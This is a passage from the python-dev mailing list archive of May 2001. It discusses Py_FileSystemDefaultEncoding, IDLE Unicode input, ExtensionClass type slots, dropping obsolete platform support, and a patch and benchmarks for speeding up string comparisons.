If that's still not enough, there are numerous doc-strings in the codecs.py module, more technical docs in the API reference and finally the unicodeobject.h header file itself. Another source for documentation and examples is the i18n-sig page on python.org. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Mon May 14 11:55:26 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 14 May 2001 11:55:26 +0200 Subject: [Python-Dev] Py_FileSystemDefaultEncoding Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl> I'm not too thrilled with the way the filename encoding stuff was done, with a global var declared in posixmodule.c which is then used by bltinmodule.c. It took me quite a while to figure out why my builds were failing, and how to fix it. And I think other minority platforms may have the same problem, so maybe it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an include file, and do the initialization in a more "common" place? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From fredrik at pythonware.com Mon May 14 12:18:49 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Mon, 14 May 2001 12:18:49 +0200 Subject: [Python-Dev] State of curses tutorial? References: <20010514012017.A6971@thyrsus.com> Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff> eric wrote: > > 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it > was Andrew, that's OK -- but the reference in the latest version of the > library docs still cites him. that would be either you (who reworked the document), or andrew (who checked in your changes). 
looks like fred has already fixed it: Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake Use appropriate markup for multiple authors; LaTeX's \author is not additive; the second occurrance was causing the first author to be dropped. > 2. I don't seem to have the TeX source anymore. Where can I download it? it's in the py-howto CVS tree: http://sourceforge.net/projects/py-howto Cheers /F From loewis at informatik.hu-berlin.de Mon May 14 13:29:21 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:29:21 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com> Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de> > I have a bug report assigned to myself which indicates similar > problems with _tkinter and Tk/Tcl. There were other problem > reports on the German Python mailing list going in the same > direction too. > > The basic problem seems to be that Tk/Tcl applies too much > magic to the text widget contents in order to find out the > used encoding and this can easily cause the whole encoding > mechanism to fail. This is actually a different problem. In this scenario here, the user types non-ASCII character into a text widget, then _tkinter returns a Unicode object (IMO rightfully so). In the other problem, the Python program puts a byte string into a text widget, the user enters some more characters, and _tkinter returns a byte string which does not follow any encoding. > A Tk/Tcl expert should really look into this and fix _tkinter.c > to aid Tk/Tcl in not mixing up the encodings (e.g. it would > probably be a good idea to recode Python 8bit-strings into > whatever encoding Tk/Tcl assumes as default). Again, this is not the issue here: Both _tkinter and Tk behave absolutely correct IMO. 
The question is how IDLE should deal with it. Regards, Martin From loewis at informatik.hu-berlin.de Mon May 14 13:41:26 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:41:26 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com> Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> > Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? Perhaps the Tcl version? That sounds like the issue that Marc talked about: Tk behaves differently when text is entered programmatically (and perhaps through cut-n-paste), as compared to text entered through the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on Solaris 8 still gives me the UnicodeError. Regards, Martin From MarkH at ActiveState.com Mon May 14 14:20:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 22:20:43 +1000 Subject: [Python-Dev] Py_FileSystemDefaultEncoding In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl> Message-ID: > I'm not too thrilled with the way the filename encoding stuff was > done, with a My apologies. I did try and publicise the patch as much as possible. A misguided attempt at a low-impact change :( I have checked in the changes you suggest. Mark. From barry at digicool.com Mon May 14 14:54:59 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 08:54:59 -0400 Subject: [Python-Dev] Unicode docs References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15103.54691.560967.853132@anthem.wooz.org> >>>>> "M" == M writes: M> True. 
The main source of documentation for Unicode still is the M> proposal itself (Misc/unicode.txt). It needs some reordering M> and a few examples, but does contain all the information needed M> to grasp what the implementation intends and how it works. As a first step, why not PEP-ify that document, much like as has been done with the DB-API (version 1 & 2)? It can be an informational PEP. -Barry From esr at thyrsus.com Mon May 14 17:11:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 11:11:57 -0400 Subject: [Python-Dev] State of curses tutorial? In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200 References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff> Message-ID: <20010514111157.C10920@thyrsus.com> Fredrik Lundh : > it's in the py-howto CVS tree: > > http://sourceforge.net/projects/py-howto What module is the Python-HOWTO in? -- Eric S. Raymond "The best we can hope for concerning the people at large is that they be properly armed." -- Alexander Hamilton, The Federalist Papers at 184-188 From skip at pobox.com Mon May 14 17:54:54 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 14 May 2001 10:54:54 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <15103.65486.61021.328424@beluga.mojam.com> Martin> That *should* work, except that it also has its 'methods' field Martin> where tp_traverse would go, and its class_flags field where Martin> tp_clear would go. Okay, so I'm completed confused now. 
I extended the definition of ECTypeType to include this after the doc string slot: (traverseproc)0, /* tp_traverse */ (inquiry)0, /* tp_clear */ (richcmpfunc)0, /* rich comparisons */ 0L, /* weak reference enabler */ #ifdef COUNT_ALLOCS /* these must be last */ 0, /* tp_alloc */ 0, /* tp_free */ 0, /* tp_maxalloc */ (struct _typeobject *)0, /* tp_next */ #endif When I looked at the definition of ECType, after the doc string I saw METHOD_CHAIN(ExtensionClass_methods) as Martin indicated. I can't simply insert the same zeroes at the end of the ECType def'n as I did at the end of the ECTypeType definition. Where does this METHOD_CHAIN thing go? I looked at the def'n of struct _typeobject in Include/object.h but didn't see a slot that looked suitable. FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, I get Fatal Python error: UNREF invalid object when I run my failing script. This is with and without making any changes to ECType or ECTypeType. Skip From sdm7g at Virginia.EDU Mon May 14 19:04:56 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Mon, 14 May 2001 13:04:56 -0400 (EDT) Subject: [Python-Dev] deprecated platforms Message-ID: Jack asked me about: https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470 which concerns removing the support for --with-next-framework from the build procedure. I'm all for removing it: it's broken for OSX, if it worked, it doesn't do the whole job ( I think framework support should eventually be added for OSX with a separate post-build script -- a real framework should encapsulate all of the python libs, docs and headers files in one bundle. ) nobody seems to know if it still works on Next or OpenStep. However, I said I thought there ought to be some sort of official procedure for removing platform support. This doesn't seem to be addressed in either PEP 4 (Deprecation of Standard Modules) or PEP 5 (Guidelines for Language Evolution). 
I don't think it needs to be as involved a process as PEP 4 or 5 -- it's a more reversible decision than removing a feature from the language. Although, removing a platform dependent feature -- like in the long discussion about case sensitivity -- may be a bigger deal. But I'm really thinking more about things like the Next case -- where there are build options and #ifdefs that, as far as we know, haven't been tested in several versions. (Believe it or not, there are still folks hanging dearly onto their black NeXT cubes, and finding them useful -- but I have no idea if any of them are using Python, and there are lots of users out there whom we only hear from when they discover a problem.) Perhaps there should be some sort of "Last Call for Platform Saviour": if nobody steps forward who is willing to do test builds on that platform, support may be removed if maintaining it is getting in the way. Any thoughts or opinions on this? Are there any other platforms where this might become an issue? If this looks like it's unlikely to crop up again, then maybe we don't need to bother with a 'policy'. What about support for particular compilers and build environments: (Borland C on Windows and MPW on Mac are two examples of "minority" compilers.) BTW: As I've thought more about this particular issue (--with-next-framework) I don't think it's as big an issue -- removing that switch isn't going to break the build entirely (I think!). Pulling out all of the #ifdefs for Next would be a larger issue, but that hasn't been proposed (yet). If the consensus is that this isn't a big enough issue, in general, to need an official policy, then I vote to pull it out and see if anyone screams. -- Steve Majewski From guido at digicool.com Mon May 14 22:53:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 15:53:26 -0500 Subject: [Python-Dev] deprecated platforms In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
References: Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com> I can't really add much to this discussion, since I have *absolutely* *no* *idea* what kind of framework we're talking about here... I agree with Steve that we shouldn't be too scared of removing support for obsolete platforms. People hanging on to obsolete platforms may as well hang on to obsolete Python versions... --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Mon May 14 21:40:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 21:40:21 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> > Okay, so I'm completed confused now. I extended the definition of > ECTypeType to include this after the doc string slot: > > (traverseproc)0, /* tp_traverse */ > (inquiry)0, /* tp_clear */ > (richcmpfunc)0, /* rich comparisons */ > 0L, /* weak reference enabler */ > > #ifdef COUNT_ALLOCS > /* these must be last */ > 0, /* tp_alloc */ > 0, /* tp_free */ > 0, /* tp_maxalloc */ > (struct _typeobject *)0, /* tp_next */ > #endif Why did you do that? ECTypeType has the right data type (PyTypeObject). It is the instances of PyExtensionClass that are troubling > When I looked at the definition of ECType, after the doc string I saw > > METHOD_CHAIN(ExtensionClass_methods) > > as Martin indicated. I can't simply insert the same zeroes at the end of > the ECType def'n as I did at the end of the ECTypeType definition. Of course not. ECType is of type PyExtensionClass, not of type PyTypeObject. Those are similar, but not equal. 
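Martin's point is that a PyExtensionClass starts out like a PyTypeObject but then diverges. This can be illustrated with ctypes. The two structures below are hypothetical and heavily simplified, three fields each. They are not the real layouts from object.h or ExtensionClass.h. They are arranged so that `methods` sits at the offset of `tp_traverse` and `class_flags` at the offset of `tp_clear`, as described in the thread. Reading an ExtensionClass-shaped object through the type-object layout returns the methods pointer as if it were a traverse function.

```python
import ctypes

# Hypothetical, heavily simplified stand-ins; NOT the real struct layouts.
class TypeObjectTail(ctypes.Structure):
    _fields_ = [
        ("tp_doc", ctypes.c_char_p),
        ("tp_traverse", ctypes.c_void_p),  # GC code would call this as a function
        ("tp_clear", ctypes.c_void_p),
    ]

class ExtensionClassTail(ctypes.Structure):
    _fields_ = [
        ("tp_doc", ctypes.c_char_p),
        ("methods", ctypes.c_void_p),      # occupies the tp_traverse position
        ("class_flags", ctypes.c_long),    # occupies the tp_clear position
    ]

def reinterpret(ec):
    """View an ExtensionClassTail's memory through the TypeObjectTail layout."""
    ptr = ctypes.cast(ctypes.pointer(ec), ctypes.POINTER(TypeObjectTail))
    return ptr.contents

ec = ExtensionClassTail(b"doc", 0x1234, 1)
view = reinterpret(ec)
# The 'methods' pointer, misread as a traverse function:
print(hex(view.tp_traverse))
```

In the real interpreter, the garbage collector would jump through that misread pointer.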
> Where does this METHOD_CHAIN thing go? I looked at the def'n of > struct _typeobject in Include/object.h but didn't see a slot that > looked suitable. Just have a look at ExtensionClass.h instead. > FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, > I get > > Fatal Python error: UNREF invalid object > > when I run my failing script. This is with and without making any changes > to ECType or ECTypeType. BTW, what version of PyGtk did you try to compile? I've tried the 0.7.0-dont-use, and it can run examples/testgtk without major problems (the example did need some updates, since it is apparently outdated). My Gtk version was 1.2, on Linux. In any case, I think you need to analyse this in a debugger. Regards, Martin From tim at digicool.com Mon May 14 22:12:44 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 16:12:44 -0400 Subject: [Python-Dev] Comparison speed Message-ID: Here's a simple test program:

    from time import clock

    indices = [1] * 100000

    def doit():
        s = clock()
        i = 0
        while i < 100000:
            "ab" < "cd"
            i += 1
        f = clock()
        return f - s

    for i in xrange(10):
        print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS: C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.107 0.106 0.109 0.106 0.106 0.106 0.106 0.106 0.105 0.106 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.118 0.118 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 C:\Code\python\dist\src\PCbuild>python timech.py 0.119 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 So "something happened" between 2.0 and 2.1 to slow this overall by 10%. string_compare hasn't changed, so rich comparisons are a good guess.
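Tim's script relies on `time.clock` and `xrange`, and neither exists in current Python 3 (`time.clock` was removed in 3.8). Below is a minimal sketch of the same measurement using the standard `timeit` module. The operands are bound in `setup` so the comparison is evaluated at run time, and it reports the best of several runs. The helper name `best_time` is illustrative, and absolute numbers will bear no relation to the 2001 figures.

```python
import timeit

def best_time(stmt, setup="pass", number=100_000, repeat=10):
    """Return the fastest of `repeat` runs, each executing `stmt` `number` times."""
    return min(timeit.repeat(stmt, setup=setup, number=number, repeat=repeat))

if __name__ == "__main__":
    # Operands live in setup, so the comparison cannot be folded at compile time.
    cases = {
        "str < str": 'a = "ab"; b = "cd"',
        "int < int": "a = 2; b = 3",
    }
    for label, setup in cases.items():
        print(f"{label}: {best_time('a < b', setup):.4f}s")
```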
Note that the more obvious timing loop obscures the issue:

    def doit():
        s = clock()
        for i in indices:
            "ab" < "cd"
        f = clock()
        return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.070 0.069 0.069 0.070 0.069 0.069 0.069 0.070 0.069 0.069 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.076 0.076 0.076 0.076 0.076 0.077 0.076 0.076 0.076 0.076 C:\Code\python\dist\src\PCbuild>python timech.py 0.069 0.070 0.070 0.069 0.069 0.070 0.070 0.069 0.070 0.069 for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out the comparison slowdown. If we try it with a type of comparison that avoids the richcmp machinery (int < int is special-cased in ceval), current CVS is actually faster than 2.0:

    def doit():
        s = clock()
        for i in indices:
            2 < 3
        f = clock()
        return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.056 0.056 0.056 0.056 0.055 0.056 0.058 0.058 0.055 0.056 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.059 0.059 0.059 0.060 0.060 0.059 0.059 0.060 0.059 0.059 C:\Code\python\dist\src\PCbuild>python timech.py 0.053 0.052 0.052 0.053 0.053 0.052 0.052 0.054 0.052 0.053 C:\Code\python\dist\src\PCbuild> This also shows that 2.1 was a bit more slothful than 2.0 for some reason other than richcmps. These were all done on a Win2K box; timings vary too much on a Win9x box to be useful. Anybody care to take a stab at making the new richcmp and/or coerce code ugly again? speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Mon May 14 22:34:35 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 22:34:35 +0200 Subject: [Python-Dev] deprecated platforms Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de> > I'm all for removing it: So am I. There are way too many build options for building Python on the Mac-like systems already (e.g.
after that change, you still have --with-dyld - or rather the option of still building .o extensions). If it is clearly broken (even if only on OSX), it should be removed. Anybody interested in the flag would need to make it work correctly before it can be revived. > However, I said I thought there ought to be some sort of official > procedure for removing platform support. I don't think such a procedure is necessary. It is not that any end user would be concerned; building Python is an activity of system administrators. The other PEPs are there because changing the language or removing modules might break *applications* that used to work after an upgrade of Python. With removed platform support, nothing will break - installations would continue to use the last release that did support that platform. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Tue May 15 00:06:57 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 00:06:57 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? When stepping through the code, I also missed support for the relationship between identity and equality. E.g. in PyObject_RichCompare, I'd expect if (v == w) { switch (op) case Py_EQ:case Py_LE:case Py_GE: Py_INCREF(Py_True); return Py_True; case Py_NE:case Py_LT:case Py_GT: Py_INCREF(Py_False); return Py_False; } } That would not help in your case, of course. I don't even know how frequent comparing identical objects is in real life - but this is something that PyObject_Compare has that PyObject_RichCompare currently doesn't. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 14 23:55:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. 
Loewis) Date: Mon, 14 May 2001 23:55:39 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? Hi Tim, With CVS Python, 1000000 iterations, and a for loop, I currently got 0.780 0.770 0.770 0.780 0.770 0.770 0.770 0.780 0.770 0.770 With the patch below, I get 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 0.710 0.710 The idea is to let strings support richcmp; this also allows some optimization for the EQ case. Please let me know what you think. Martin Index: stringobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v retrieving revision 2.115 diff -u -r2.115 stringobject.c --- stringobject.c 2001/05/10 00:32:57 2.115 +++ stringobject.c 2001/05/14 21:36:36 @@ -596,6 +596,51 @@ return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0; } +/* In the signature, only a is guaranteed to be a PyStringObject. + However, as the first thing in the function, we check that b + is of that type also. */ + +static PyObject* +string_richcompare(PyStringObject *a, PyStringObject *b, int op) +{ + int c; + PyObject *result; + if (!PyString_Check(b)) { + result = Py_NotImplemented; + goto out; + } + if (op == Py_EQ) { + if (a->ob_size != b->ob_size) { + result = Py_False; + goto out; + } +#ifdef CACHE_HASH + if (a->ob_shash != b->ob_shash + && a->ob_shash != -1 + && b->ob_shash != -1) { + result = Py_False; + goto out; + } +#endif + } + c = string_compare(a, b); + switch (op) { + case Py_LT: c = c < 0; break; + case Py_LE: c = c <= 0; break; + case Py_EQ: c = c == 0; break; + case Py_NE: c = c != 0; break; + case Py_GT: c = c > 0; break; + case Py_GE: c = c >= 0; break; + default: + result = Py_NotImplemented; + goto out; + } + result = c ? 
Py_True : Py_False; + out: + Py_INCREF(result); + return result; +} + static long string_hash(PyStringObject *a) { @@ -2409,6 +2454,12 @@ &string_as_buffer, /*tp_as_buffer*/ Py_TPFLAGS_DEFAULT, /*tp_flags*/ 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + (richcmpfunc)string_richcompare, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ }; void From gstein at lyra.org Tue May 15 00:17:56 2001 From: gstein at lyra.org (Greg Stein) Date: Mon, 14 May 2001 15:17:56 -0700 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400 References: Message-ID: <20010514151755.P1374@lyra.org> On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote: >... > Anybody care to take a stab at making the new richcmp and/or coerce code > ugly again? > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim Euh... isn't Guido's preference for cleanliness over speed? Cheers, -g -- Greg Stein, http://www.lyra.org/ From tim at digicool.com Tue May 15 00:35:33 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 18:35:33 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010514151755.P1374@lyra.org> Message-ID: [Greg Stein] > Euh... isn't Guido's preference for cleanliness over speed? So do both. From greg at cosc.canterbury.ac.nz Tue May 15 03:42:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 15 May 2001 13:42:49 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" : > I also missed support for the > relationship between identity and equality. That would severely restrict the semantics that could be given to the comparison operators by overloading them. 
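Greg's objection can be seen with a type whose equality is deliberately not reflexive. IEEE 754 NaN is the standard case: `nan == nan` is False. In current CPython 3, an identity shortcut like the one Martin describes does exist, but only in the container-level helper (`PyObject_RichCompareBool`, used by `in`, list equality and similar operations). The `==` operator itself has no such shortcut. The sketch shows both behaviours. The class `NeverEqual` and the helper `equality_report` are hypothetical examples.

```python
class NeverEqual:
    """Hypothetical type whose __eq__ is never true, not even against itself."""
    def __eq__(self, other):
        return False
    __hash__ = object.__hash__  # keep instances hashable despite defining __eq__

def equality_report(obj):
    return {
        "obj == obj": obj == obj,          # the operator: no identity shortcut
        "obj in [obj]": obj in [obj],      # containment: identity checked first
        "[obj] == [obj]": [obj] == [obj],  # element-wise: identity checked first
    }

for sample in (float("nan"), NeverEqual()):
    print(type(sample).__name__, equality_report(sample))
```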
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Tue May 15 04:40:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 21:40:33 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST." <20010514151755.P1374@lyra.org> References: <20010514151755.P1374@lyra.org> Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com> > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim > > Euh... isn't Guido's preference for cleanliness over speed? Yeah, Tim & I have developed a nice good-cop-bad-cop routine about this. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 15 05:36:42 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:36:42 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > When stepping through the code, I also missed support for the > relationship between identity and equality. E.g. in > PyObject_RichCompare, I'd expect > > if (v == w) { > switch (op) > case Py_EQ:case Py_LE:case Py_GE: > Py_INCREF(Py_True); > return Py_True; > case Py_NE:case Py_LT:case Py_GT: > Py_INCREF(Py_False); > return Py_False; > } > } > > That would not help in your case, of course. I don't even know how > frequent comparing identical objects is in real life - but this is > something that PyObject_Compare has that PyObject_RichCompare > currently doesn't. 
Guido insisted (with cause ) on these four pairs as being equivalent:

    x < y    iff    y > x
    x <= y          y >= x
    x == y          y == x
    x != y          y != x

but beyond that, in the presence of rich comparisons, agreed not to make any other assumptions about what those pixel-bags "mean". In particular, there's no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies "x != y", etc. Applying that to the above leaves you with nothing but

    if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

    if (v == w) return 0;

assumes too. So I don't see much future in that. [later, a patch to fill in the richcmp slot for strings] > +static PyObject* > +string_richcompare(PyStringObject *a, PyStringObject *b, int op) > +{ > + int c; > + PyObject *result; > + if (!PyString_Check(b)) { > + result = Py_NotImplemented; > + goto out; > + } > + if (op == Py_EQ) { > + if (a->ob_size != b->ob_size) { > + result = Py_False; > + goto out; > + } > +#ifdef CACHE_HASH > + if (a->ob_shash != b->ob_shash > + && a->ob_shash != -1 > + && b->ob_shash != -1) { > + result = Py_False; > + goto out; > + } > +#endif > + } > + c = string_compare(a, b); > + switch (op) { > + case Py_LT: c = c < 0; break; > + case Py_LE: c = c <= 0; break; > + case Py_EQ: c = c == 0; break; > + case Py_NE: c = c != 0; break; > + case Py_GT: c = c > 0; break; > + case Py_GE: c = c >= 0; break; > + default: > + result = Py_NotImplemented; > + goto out; > + } > + result = c ? Py_True : Py_False; > + out: > + Py_INCREF(result); > + return result; [and that yields about an 8% speedup in the "<" case] That looks on the right track, but maybe at the wrong level: why is it necessary? That is, the bulk of the "smarts" here in the switch stmt are type-independent: if there's no specific implementation of individual comparisons, but there is a tp_compare, then the switch stmt applies verbatim to *any* such type. Do we have to fill in the richcmp slot for everything to get Python to realize that?
I mean "just about everything", too: while, e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then, but thru the general comparison routines). The "speed problem" appears to be: + COMPARE_OP calls cmp_outcome() + which calls PyObject_RichCompare() + which calls do_richcmp() + which calls try_rich_compare() (unsuccessfully now, successfully after your patch) which fails to find a richcmp slot on either operand (now) so says "not implemented" + then calls try_3way_to_rich_compare() + which calls try_3way_compare() + which finally calls the tp_compare slot + then runs exactly the same switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; case Py_EQ: c = c == 0; break; case Py_NE: c = c != 0; break; case Py_GT: c = c > 0; break; case Py_GE: c = c >= 0; break; } result = c ? Py_True : Py_False; switch as your patch and things unwind. So we've got 7 function calls there, not even counting calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine instructions that actually do the compare . You got an 8% speedup for one type by tricking the switch stmt into appearing 3 calls earlier. What if the implementation were smarter, and did it for *all* relevant types even a call or two before that? I don't see any reason "in principle" that compares couldn't be much faster, and via the usual gimmicks: bigger, smarter functions that remember what they've already determined so don't need to figure it out over and over again, and fast paths to favor common cases at the expense of comparisons from Mars. 
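Tim's point is that the six-way switch is type-independent. Given any three-way result `c`, each rich operator is just a comparison of `c` against zero. The reflected pairs Guido insisted on (`x < y` iff `y > x`, and so on) follow from swapping the operands, which negates `c`. Below is a Python sketch of that generic mapping using the `operator` module. `three_way` is an illustrative stand-in for a type's tp_compare slot, not a CPython API.

```python
import operator

# Each rich operator is applied to (c, 0), where c is a three-way result.
RICH_FROM_3WAY = {
    "lt": operator.lt, "le": operator.le, "eq": operator.eq,
    "ne": operator.ne, "gt": operator.gt, "ge": operator.ge,
}

# The four equivalent pairs: op(x, y) iff SWAPPED[op](y, x).
SWAPPED = {"lt": "gt", "le": "ge", "eq": "eq", "ne": "ne", "gt": "lt", "ge": "le"}

def three_way(v, w):
    """Stand-in for a tp_compare slot: negative, zero or positive."""
    return (v > w) - (v < w)

def rich_compare(v, w, op, cmp=three_way):
    """Derive any of the six rich comparisons from one three-way compare."""
    return RICH_FROM_3WAY[op](cmp(v, w), 0)

print(rich_compare("ab", "cd", "lt"))
```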
One thing to note here: the workhorse comparisons are "like strings" in having no *logical* need for richcmps at all; and the objects for which richcmps were introduced were numerical arrays, which can much better afford a longer code path to *find* them (one matrix compare will trigger many vanilla element compares anyway, so even for arrays it's much more important that the *latter* be fast). The code now is approximately backwards in that respect (it takes gobs of work before we even *look* for a cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're doing an explicit "cmp" compare, the code now tries to *simulate* cmp first via a long sequence of richcmp calls!). I don't have time to uglify this code, but Python would benefit from it. and-no-matter-what-guido-may-say-ly y'rs - tim From tim.one at home.com Tue May 15 05:50:00 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:50:00 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message-ID: [Guido] > Index: spam.c > ... Congratulations! "My other" ISP (MSN) just started tagging suspected spam with "spam" in the subject line, and my mail reader moves that to a special spam folder upon delivery. So far this is the one and only incoming email it's moved. Many solicitations to help foreign nationals move large sums of money out of their country have gotten through, along with a number of intriguing promises that I can easily increase the size of my penis -- like I have any need for either of those . reads-every-spam-he-gets-top-to-bottom-ly y'rs - tim From esr at thyrsus.com Tue May 15 05:53:38 2001 From: esr at thyrsus.com (Eric S.
